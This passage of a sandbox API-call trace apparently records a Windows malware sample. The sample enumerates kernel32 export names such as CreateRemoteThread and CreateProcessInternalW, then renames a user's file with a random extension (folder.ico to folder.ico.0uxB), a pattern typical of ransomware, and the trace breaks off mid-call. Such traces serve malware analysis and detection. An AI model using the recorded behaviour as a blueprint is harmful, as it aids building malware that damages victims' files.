(lpString="CREATEDIRECTORYA") returned 16 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.209] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.209] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.209] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.209] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.209] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.209] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.209] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.209] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.209] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.209] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.209] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.209] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.209] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.209] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.209] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.209] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.210] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.210] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.210] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.210] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.210] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.210] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.210] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.210] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.210] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.210] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.210] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.210] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.210] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.210] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.210] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.210] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.210] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.210] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.210] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.211] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.211] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.211] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.211] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.211] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.211] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.211] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.211] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.211] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.211] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.211] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.211] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.211] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.211] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.211] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.211] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.211] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.211] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.211] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.211] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.212] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.212] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.212] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.212] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.212] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.212] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.212] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.212] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.212] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.212] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.212] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.212] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.212] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.212] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.212] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.212] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.212] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.212] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.212] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.213] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.213] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.213] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.213] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.213] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.213] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.213] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.213] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.213] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.213] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.213] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.213] lstrlenA (lpString="DELETEATOM") returned 10 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.213] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.213] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.213] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.213] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.213] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.213] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.213] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.214] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.214] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.214] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.214] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.214] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.214] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.214] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.214] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.214] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.214] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.214] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.214] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.214] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.214] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.214] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.214] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.214] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.214] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.214] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.214] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.215] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.215] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.215] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.215] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.215] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.215] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.215] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.215] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.215] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.215] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.215] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.215] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.215] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.215] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.215] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.215] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.216] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 69 [0084.216] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.0uxB") returned 74 [0084.216] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 